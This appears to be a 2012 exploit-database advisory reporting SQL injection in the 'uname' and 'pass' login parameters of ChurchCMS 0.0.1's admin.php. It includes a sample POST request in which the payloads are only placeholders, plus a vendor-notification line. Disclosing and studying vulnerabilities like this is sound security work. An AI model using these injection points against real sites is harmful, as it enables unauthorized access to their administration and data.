# Exploit Title: ChurchCMS 0.0.1 'admin.php' Multiple SQLi # Date: 04/21/12 # Author: G13 # Twitter: @g13net # Software Link: http://sourceforge.net/projects/churchcms/?source=directory # Version: 0.0.1 # Category: webapps (php) # ##### Description ##### ChurchCMS is the software to place on your church's website that is easily managed, self-intuitive, yet expandable via our module library. Included features are: announcements, calendar, prayer requests manager, and help wanted manager. ##### Vulnerability ##### The admin.php page has multiple SQL injection vulnerabilities. Both the 'uname' and 'pass' parameters are vulnerable to SQL Injection. The vulnerability exists via the POST method. ##### Exploit ##### POST http://localhost/churchcms/admin.php?op=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:11.0) Gecko/20100101 Firefox/11.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Proxy-Connection: keep-alive Referer: http://localhost/churchcms/index.php Cookie: PHPSESSID=eq342ldrgqt4i5fshe6q2kvj17 Content-Type: application/x-www-form-urlencoded Content-length: 40 uname=[SQLi]&pass=[SQLi] ##### Vendor Notification ##### 04/21/12 - Vendor notified Per my disclosure policy, advisory is released. http://www.g13net.com/vuln-disc.txt